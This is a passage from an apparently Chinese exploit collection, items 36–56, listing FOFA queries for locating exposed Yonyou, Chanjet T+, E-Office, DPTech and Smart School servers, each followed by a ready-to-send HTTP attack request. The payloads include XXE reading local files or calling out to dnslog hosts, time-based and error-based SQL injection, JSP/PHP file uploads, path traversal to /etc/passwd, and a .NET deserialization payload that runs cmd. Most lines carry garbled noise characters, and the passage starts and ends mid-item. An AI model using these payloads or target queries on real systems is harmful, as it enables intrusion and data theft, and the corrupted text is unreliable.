User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info5 x( Z9 ` b$ a' J8 S
Accept-Encoding: gzip, deflate
$ ]9 |" c1 z* d- G* QAccept: */*# H% O0 g7 k1 G8 ?! g
Connection: close
( l( |% S$ G# E2 \8 m5 c/ ?accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
# @6 I4 Y0 p6 }- n; R' ~Content-Length: 190' L) P' N, X9 Z5 w
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df07 y, w3 J7 @6 ?9 ]' A# X' d6 T _
7 b5 g( b6 @- e7 G) U
--fd28cb44e829ed1c197ec3bc71748df01 a- M* H, g' K" R+ U
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
|+ ]3 [% a/ I0 F; k4 C* ~: I3 X) U) U# W3 I+ Q- V
<%out.println(1111*1111);%>
5 d- P A O6 J--fd28cb44e829ed1c197ec3bc71748df0--' J! h1 z$ o+ y' f7 C
$ R. `! t( _; e5 d& X, H5 c
% Q' r9 J5 o8 K) p7 v/ D
36. 用友NC-Cloud soapFormat XXE; `8 j( N/ y1 _& b) ~* ?2 L( j
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 V: \( Z# k! _# A; K" B* W7 DPOST /uapws/soapFormat.ajax HTTP/1.15 W/ r$ |) l' h0 t. [; `
Host: 192.168.40.130:8989
: Q. {* y) z6 `# c! E& @- H' WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.08 l% N( ?% o0 j7 z) L' H- j# ^
Content-Length: 263
# T; h& A$ B& U" f7 C6 S( B) ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 U" s0 g& ] [# c( w0 zAccept-Encoding: gzip, deflate- E! q- j% n6 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& i4 S4 E9 j+ j& s$ }
Connection: close) ]& g! g6 K- e* u4 ]- G# Z
Content-Type: application/x-www-form-urlencoded
5 X$ c' J6 }% C' R. r2 K8 vUpgrade-Insecure-Requests: 14 A. R" H& A2 _6 j& e0 ^2 m
9 k7 O9 V( F! u4 s' F4 }
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
) ]3 a/ u6 v# k; S, T1 S6 }0 v3 I* a8 v, _3 g; P
7 C3 m. H, v; e37. 用友NC-Cloud IUpdateService XXE
x x p( M6 x: f; r+ t5 wFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
/ m- h1 m$ m- u# A# V ~POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ c4 a* ]& b3 L Y5 eHost: 192.168.40.130:8989
' q4 V5 _- E; a& [/ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
9 c7 k, t! t- T) N* h. qContent-Length: 421
& L0 y- l4 t* ~+ |& K+ j' pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) `( w2 _; w/ u& [) g1 |+ D
Accept-Encoding: gzip, deflate& ^- V& x: U: ` Q3 _/ |0 E. e
Accept-Language: zh-CN,zh;q=0.9
% R7 ~; d( a+ Y; m( e0 Z LConnection: close+ [$ X- ?1 M2 j1 Z1 x9 ~* i: U
Content-Type: text/xml;charset=UTF-8
+ n1 c$ }& u; S I4 ~SOAPAction: urn:getResult
3 S; m/ d) s& E) d: s# rUpgrade-Insecure-Requests: 1# H' q4 }0 R( d6 W/ f5 P# S
5 ]& n$ }, e7 n2 E4 g
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">! z- b( a2 }$ c5 ~( p
<soapenv:Header/>
5 F1 a9 h- v7 a Q8 b9 U<soapenv:Body>, r) [' s5 P+ [1 b* L6 Y
<iup:getResult>. D' _) u( _1 X+ A2 _9 u# U( X( x8 f
<!--type: string-->
' F% _3 F% o7 L<iup:string><![CDATA[
2 B" ]( l! w5 q$ ^<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>4 e8 [9 T% P% l% e) ]
<xxx/>]]></iup:string>
8 G- [) e* v+ t3 X0 z& ~</iup:getResult>
! ^, f, {' j: s& F8 m9 [5 S! o</soapenv:Body>! {# P) R& j" V; ~9 U: q
</soapenv:Envelope>
% o( E" F6 k1 }2 m' ?. o
: n1 F& w, a3 V5 R1 z3 \
' E9 c2 ?6 ^/ G. P# V6 M9 X4 {& Q- W# k2 m' P$ a% F3 I
38. 用友U8 Cloud smartweb2.RPC.d XXE
4 i1 c; T. }6 e) _" }FOFA:app="用友-U8-Cloud"
' e4 O- T' F: _. K+ pPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
: T0 j- C I; R: w8 UHost: 192.168.40.131:8088$ |- E' R9 n+ M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
/ V( X P) U X# a I! ]Content-Length: 260
" T8 l' k$ L& oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
$ D2 i3 j2 m$ V- uAccept-Encoding: gzip, deflate, t. l0 ]; `/ [' ^* h
Accept-Language: zh-CN,zh;q=0.9
7 O7 @& ?7 R1 _7 aConnection: close: ^% j8 l7 g6 O* h- D' y
Content-Type: application/x-www-form-urlencoded
6 }# a; A7 |7 Y$ U. x5 `. G" Z5 h) M
( o. d( c2 Q+ H: m__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
2 Z3 S y/ s0 O! I9 O: l, f/ S$ p9 k" a/ j2 z0 c
7 d: |" k& B% g) v. h
39. 用友U8 Cloud RegisterServlet SQL注入
6 c" j0 O( I8 lFOFA:title="u8c"
# _9 n: S5 N" j3 ]+ F4 YPOST /servlet/RegisterServlet HTTP/1.16 |( F- A' U" G; M6 O, u
Host: 192.168.86.128:8089' P8 [8 {" B$ H# F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
5 A" x# {) t1 w9 D1 v- s2 ~Connection: close' H! T# W# D4 u/ t
Content-Length: 85& l% j3 d0 `7 X6 E! B- _1 K
Accept: */*) K* o1 H* Y' z4 y3 f% }+ Z. c
Accept-Language: en
9 R' s: k0 p, e m- Y, cContent-Type: application/x-www-form-urlencoded
6 \. H+ l0 K% |) BX-Forwarded-For: 127.0.0.1
! A6 M4 A; H. r: N* `4 F; iAccept-Encoding: gzip
' C: O5 E! [% e. m0 v& z: k$ r& Y4 O/ o: _4 {" s9 E* T7 o" {
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
" Q3 S9 n/ P& B9 q! L% {
; R) O0 q3 v! @; W6 ~) ^! D% G& Z: k. k; ]7 ?3 j* G
40. 用友U8-Cloud XChangeServlet XXE
, m/ |: o6 F! a+ R; o# A9 h) RFOFA:app="用友-U8-Cloud"
0 h4 T" a: N5 U7 K. APOST /service/XChangeServlet HTTP/1.1" i5 D' V5 d7 E: Z
Host: x.x.x.x
, ?% J1 H% D* @& r4 T% X- CUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) e+ ~; J% S% X. [; s) ~
Content-Type: text/xml3 A: [- m: \0 c o; i7 M- x9 ~5 ?
Connection: close
* @% \, k% u/ _+ |+ {( T8 |' s, x* t) l2 ]3 E) s7 `# e
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
! m2 R0 j6 `8 n; D3 @
$ l5 `2 L3 n5 X# S- e
0 {+ b/ e$ Z$ a/ a/ c0 m, N. N41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
4 F8 S- y" t) x' ~% N: |# TFOFA:app="用友-U8-Cloud"" D9 ~+ M+ l) y# p5 Q( `
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.17 A* T8 V3 i9 u1 R
Host: a o: \2 T! q% ~" Y* m4 ]( v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( L+ i% \' B- R( ~+ q7 j- J5 BContent-Type: application/json. u$ t6 X5 G4 G
Accept-Encoding: gzip* L+ e% S; ^1 }3 G U* Y6 i0 k
Connection: close" I9 Z. {( W' i% t" ~5 ?% V p. T
- i# z0 ?% V7 [ \
* K' S$ |7 ]" A* u }42. 用友GRP-U8 SmartUpload01 文件上传4 K+ ]! D; h: {0 G( K5 G+ P1 {
FOFA:app="用友-GRP-U8"
, o# y/ a- v! qPOST /u8qx/SmartUpload01.jsp HTTP/1.1
7 H5 R, o* I! e$ v% i! s/ gHost: x.x.x.x
# u+ E' Y5 v, L5 I( {9 IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
( O* N9 G( a T* yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
* L' {* G# o" `& _$ o
- W, t* t! h. i0 BPAYLOAD* X- _; _- C/ }$ x& Q; Y
8 |4 |4 C/ B3 J: |
% b: _$ [, w3 S# [- j( J5 Ehttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
1 o6 ~/ [6 j' f$ b0 }+ k- g( l
+ c, F6 F3 G% n2 O43. 用友GRP-U8 userInfoWeb SQL注入致RCE% Q+ U* Q. P9 }
FOFA:app="用友-GRP-U8"3 j- i" h& y8 T) `0 q. }
POST /services/userInfoWeb HTTP/1.1# k) a8 q5 L3 U* n* K; {
Host: your-ip1 m/ y3 |* A* T4 n+ q) d7 ^9 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
3 p0 G7 R: X- _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ X y( N: d+ l( c/ g
Accept-Encoding: gzip, deflate
% u+ q+ b0 H, ]& bAccept-Language: zh-CN,zh;q=0.9
S S; @7 {. Q2 \1 T/ s8 dConnection: close; H& N* K9 ~( m- v9 m5 o% _
SOAPAction:
! A( p" J6 f" M9 X5 R) k9 ZContent-Type: text/xml;charset=UTF-8# R0 o' ~! x% j c$ H* |
; g n6 M/ h( \4 c; N
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">7 {+ S# p7 H# [- G- c9 X, r
<soapenv:Header/>5 V5 t4 A; G/ Y9 Z. Z% U+ q& S
<soapenv:Body>
2 n8 B- `) ~0 f6 m1 F# B <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">8 m5 _7 P8 |5 ~, _, w/ k' t5 R6 Q0 N
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
! z, a% [+ A4 J$ L& G0 { </ser:getUserNameById>
6 e$ w( v1 w/ i& O- b </soapenv:Body>
6 \. K! g# R Z</soapenv:Envelope>
* M& h. Z$ ^8 A5 e, ?' [ _. m# r6 P: @
* \" n% a3 u7 q; z) ~' E8 n$ J2 a( v o2 E5 j" h8 z
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
; s) n! N- x! Q( q9 B, m* H/ CFOFA:app="用友-GRP-U8"
( n' w$ c& G4 u' G) W6 W" fGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
: h) [- x; x# G& j" F+ r- U+ p z$ vHost: your-ip
6 w& T* s4 M9 Q9 H+ c" }2 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.369 [5 u1 u$ f: J2 F% V1 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ e* l" |+ F s7 K; H0 }) KAccept-Encoding: gzip, deflate6 h, L! ]- c; e( T2 E
Accept-Language: zh-CN,zh;q=0.9
- s& `; T, S8 @/ PConnection: close% r0 n0 S9 d5 F9 t! u9 N0 o. ^4 S
. H, I. n% h, r/ i& j& {* }* r) C. G* L2 D9 y) A
45. 用友GRP-U8 ufgovbank XXE) G2 ~( g- r! t; \5 V0 C
FOFA:app="用友-GRP-U8". C/ b ], r3 l" R
POST /ufgovbank HTTP/1.1: L8 _9 A! [5 C! H( z! ^
Host: 192.168.40.130:222
# U+ u& ~+ x( k4 o; G! C6 b& X/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0# b, |5 w! o' G |- w9 O* @* w
Connection: close [+ x/ P! a8 q$ ?" h( G3 H
Content-Length: 161# m0 f3 Z6 U s. C, x* u% ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# f" Y7 v+ H- A7 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* ?& @: G' `' g8 J9 Y- jContent-Type: application/x-www-form-urlencoded
* _* h* E" `1 ]; H4 q% f( OAccept-Encoding: gzip9 h- A: V( G4 x6 f/ A
, K: F) ~3 n0 Z2 @# u
reqData=<?xml version="1.0"?>) B6 i0 m, p) |5 U- X
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest2 O" l8 R' Y8 Z# [( E; c
4 Z& I' n; c$ l! m: E
! X1 V ^- y+ D0 {) Z3 d46. 用友GRP-U8 sqcxIndex.jsp SQL注入
8 U& u& I% ^" V( l6 \+ gFOFA:app="用友-GRP-U8"
6 Q% z8 f. V' ~7 kGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1- C0 Q. F8 t: N% M
Host: your-ip
# b% Q9 Y; h5 I9 L& A! CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
' Y, ?" P3 F; s- t; @- z. JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 l/ k4 ^2 [) c$ y9 n+ i
Accept-Encoding: gzip, deflate
: r- d9 F% A% U" YAccept-Language: zh-CN,zh;q=0.9
( Z, \) T: v3 oConnection: close% d' N4 @) U) Q w
( V; @: a' j& x7 Y% w, g6 C$ a- Y# f5 T, o
47. 用友GRP A++Cloud 政府财务云 任意文件读取
8 s; w& _1 T4 j) j" v( A8 p2 M4 N3 {- JFOFA:body="/pf/portal/login/css/fonts/style.css"; [ }1 c+ `4 _
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.16 N/ F- P1 n' m; ^, Y- L; A* d1 z
Host: x.x.x.x
$ B5 l E" P" V& C' YCache-Control: max-age=0
4 T7 V$ c# K0 Z' u# M) \9 p$ }Upgrade-Insecure-Requests: 1
$ r! X. f- r h! SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 u6 }/ f, \7 { n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" U! _) D7 s- A d7 t, z- c
Accept-Encoding: gzip, deflate, br
* E% Q6 u' x+ V/ L; m* QAccept-Language: zh-CN,zh;q=0.9
9 _# o' g- v3 V% ?* RIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
/ I. n/ m0 ^* W2 t/ nConnection: close
% k6 L7 a( l; o; O/ o/ O. p; e9 x% ^. z9 G# |$ h
|2 ~) @( r2 }# q. y, E( m7 c* I2 v, r, z: `* `
48. 用友U8 CRM swfupload 任意文件上传
3 ~( x1 M5 Y2 l. P; Y) b3 QFOFA:title="用友U8CRM"
7 _ ]. W: g7 c% X4 d% bPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.11 @4 t3 Y4 R, B. x+ l
Host: your-ip. M1 A" r# ?/ R$ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: j( D! t _8 y! l N( z: E& g& {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" N4 b* p# e% a' z0 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ P( [) a' C. f3 N6 z# _+ t
Accept-Encoding: gzip, deflate5 M' \0 Z! ^# K( K- i( \9 y
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855: U3 d3 R8 ~* e
------269520967239406871642430066855
' N7 F: I: k0 @6 R6 S2 w' \Content-Disposition: form-data; name="file"; filename="s.php"
- Z g# _3 @% ^+ `7 U- e12311 \% N" J; ?0 T5 t3 W0 m9 Z h9 f$ q; ~
Content-Type: application/octet-stream1 j* Q5 H5 t/ p1 w4 R! q7 w
------269520967239406871642430066855
- p7 p: U" z1 \3 OContent-Disposition: form-data; name="upload"
. q7 C- V/ Y. q8 x( i/ Q0 Yupload2 z5 D' E( ^$ \, _5 g
------269520967239406871642430066855--
$ H8 l k; B8 e, k- q t2 q% _8 ~) ~& u5 ?) j9 q
) L, M: O1 `( J
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
5 \+ L# s- Z5 Q F& }& a3 uFOFA:body="用友U8CRM"; l# @9 R" p6 v5 \
8 V) V$ A, i; G% WPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1, ]# H; y; [) d/ P. k5 L
Host: x.x.x.x
& ?5 \6 L' v& m, aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ p/ a# u/ C9 v( Y [Content-Length: 3294 [6 w+ u6 F( K8 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! J& ?5 J4 t- Q/ X7 Z) S2 E" [: _& s9 k$ t
Accept-Encoding: gzip, deflate
8 k0 D Q4 C/ ^* sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- X4 R9 ^) ^6 q, [
Connection: close
$ P6 o) f! \2 p5 K* EContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w; C3 R% o+ D" N I/ q r# Y; e" ?
8 K& v. b" H) v6 A+ v! x- o
-----------------------------vvv3wdayqv3yppdxvn3w4 p9 X- u" P* ?. K: w) _
Content-Disposition: form-data; name="file"; filename="%s.php ": g) Z% {4 F, m# r. s* q: K
Content-Type: application/octet-stream
; P \2 O* w& N' x+ _% B: Q9 K) |5 `( E- m$ }( Y' g
wersqqmlumloqa* H% Y4 P) ~4 [9 f( N) B& o
-----------------------------vvv3wdayqv3yppdxvn3w6 d% @ n" W8 w; v. J. }0 O
Content-Disposition: form-data; name="upload"$ a5 A2 T; b' u* M# P8 m
9 g( a5 R$ b6 ^0 V
upload
. A1 t/ b1 o+ Y" i! {" S! h" G-----------------------------vvv3wdayqv3yppdxvn3w--2 J; }- Z& \0 g) S) |( s7 ]
# V$ b, U4 k! Y3 k& v& @
% Y! L3 D" b& k0 `# |http://x.x.x.x/tmpfile/updB3CB.tmp.php, @) t/ t& A, C. }
) g$ M# _5 C% c1 v
50. QDocs Smart School 6.4.1 filterRecords SQL注入
, u! Z6 G2 D# E0 m/ v% r, Z2 FFOFA:body="close closebtnmodal"
0 P0 a; G/ q1 tPOST /course/filterRecords/ HTTP/1.1' k# d8 F& H7 }, I
Host: x.x.x.x4 k! N7 F2 U7 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 v! Z) O6 P4 t! C) K) YConnection: close/ n% \% h% ]3 F$ L% _
Content-Length: 224
! o0 d" }$ U4 h& ~& lAccept: */*
+ R" q$ o- j( U) X1 f6 |Accept-Language: en
5 o* y' ]( T$ T) a( D$ v9 T+ AContent-Type: application/x-www-form-urlencoded5 h+ P" y6 ]5 k! f- q* X
Accept-Encoding: gzip
) W& E) j1 d6 F; u0 E
+ r( _/ Y$ ?/ {2 d' Qsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
1 x: f9 Q' ]+ o1 Y* a$ r8 y$ Q9 \: V$ N2 i
* U9 i) X- W' Q% {5 P; K! F; f
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
( L9 W. ?1 l V& t6 AFOFA:app="云时空社会化商业ERP系统"$ D& a g l/ w
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.12 f$ m" N: Z1 Z: b- x
Host: your-ip! J2 R( K7 _# A) @* V$ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
( ^' X: I0 v% ` I; O p6 i2 ~/ J& [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.90 X% n1 s! a, J; _+ F. F# @
Accept-Encoding: gzip, deflate/ ]: A% h1 i1 }$ k
Accept-Language: zh-CN,zh;q=0.9
% Z( ]7 p& |+ X$ W* g/ |* rConnection: close
. i5 g# B: b2 `! z
7 o" W8 ]$ l1 J, v8 s! g0 ?, G2 {. B9 F, [
52. 泛微E-Office json_common.php sql注入7 J7 {5 E# @- ^
FOFA:app="泛微-EOffice"
- B7 V8 S7 J8 @; J; z+ JPOST /building/json_common.php HTTP/1.1
( L& e. u2 ~+ E+ h9 P3 I0 BHost: 192.168.86.128:8097
6 K9 w& p5 T8 t' ^User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 x% x& ^# i Y9 v* S5 b
Connection: close2 g" a$ ]# {# r) y9 B% V
Content-Length: 87
5 J' s. ]' L. Z' y2 tAccept: */*
- C/ B2 i& `9 b" i9 |) _+ QAccept-Language: en
7 U2 Z9 @1 m7 F& `' g% c$ E* _% \# ~Content-Type: application/x-www-form-urlencoded: j" F: O6 G8 ]6 g
Accept-Encoding: gzip7 B& ^2 V( g. Y9 Z( w2 l1 r
3 J& Y5 T3 V6 p& I1 ^4 Ltfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3332 g7 U3 y2 D w, ^# Y
; k, k! S. b5 X: z9 A+ m
% C( n! L# y9 T7 E0 \
53. 迪普 DPTech VPN Service 任意文件上传
6 y8 o. Q: n- Q7 }, E/ s* aFOFA:app="DPtech-SSLVPN"
. B7 `2 D/ B: N/ m* \+ v/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd. R# d" f" L( u" p! h$ E+ c
$ a/ P: \8 d+ v& R! {! L
7 d# S3 L! e1 }) C9 ^# P
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
7 q w; ^3 ]9 T( g( m1 K! WFOFA:app="畅捷通-TPlus"
: d0 D4 U3 S' g6 S, m( I第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
$ P9 s! @0 O8 Y8 B8 m7 G d"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
6 p& h9 l# K( }. q4 m# y: m2 z; d7 g# [2 ^ d B$ K
8 E" E% F) ]- p3 ?+ M, T9 T6 p
完整数据包) u H p. |+ \
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
3 e; J" f0 y5 \# I/ B( hHost: x.x.x.x
8 u1 K! i4 s, f" e% D" wUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F2 F7 x+ L, D, Q( E8 j
Content-Length: 593$ S, s+ O9 s/ V# H; [
' Q3 g- L7 H i0 E: a& I6 Y8 G{
`4 a9 t9 O% ]# Z"storeID":{+ H: B) u9 I, _* Q z4 ~$ s
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",* P3 m: w" E7 a. ~& p5 v/ f& \
"MethodName":"Start",
- w' Q8 `% B+ M/ ?/ t- t( u0 E "ObjectInstance":{
) _7 ]2 Q" x R4 N0 d" L4 T: T M "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 l' n9 t, f, R "StartInfo":{
9 I- r: _- S1 H, l "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( E( Z/ f& V4 S "FileName":"cmd",
, |1 `1 v* q9 r! c; g "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
3 I; P. E8 D1 Q9 @& @7 H }7 u4 o5 {9 Y( t* K' d
}
2 ]/ F1 X8 a! l }
( A+ p/ e) T, C A9 O/ ~}
8 P8 K. Z$ K! \/ O5 r+ u0 c& [4 w
G/ \2 Z% w- F6 C第二步,访问如下url+ o2 w; _/ b. }
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt6 [8 X3 i# V, b- O
0 t4 d, m3 U% G; d5 ]
* x0 {& L0 y, X+ U( A' `# v* d55. 畅捷通T+ getdecallusers信息泄露
$ y- @* N% N/ \FOFA:app="畅捷通-TPlus"
' w, b7 u8 T; p7 p$ g第一步,通过4 X+ p% P1 H; ~
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie- z2 t, d& @! |* w& R
第二步,利用获取到的Cookie请求. v9 |0 S* }, D- _4 l$ d$ H9 t! r
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers9 `- C( I( [' f2 E& u
) b9 i1 @8 V4 W( f3 h
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE" ] [9 f d F: G
FOFA: app="畅捷通-TPlus"
6 |/ k- l1 n2 w6 y0 k4 }/ OPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ @4 M& C; K' `1 T& a- `
Host: x.x.x.x! m) \ O: W, n+ K0 h _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
' W y. [% m" D1 Z; X% b1 BContent-Type: application/json8 d9 e$ j2 D# I" V5 M4 q$ j7 \ z
' I* l& ~" v3 |$ |* R" L/ Y
{
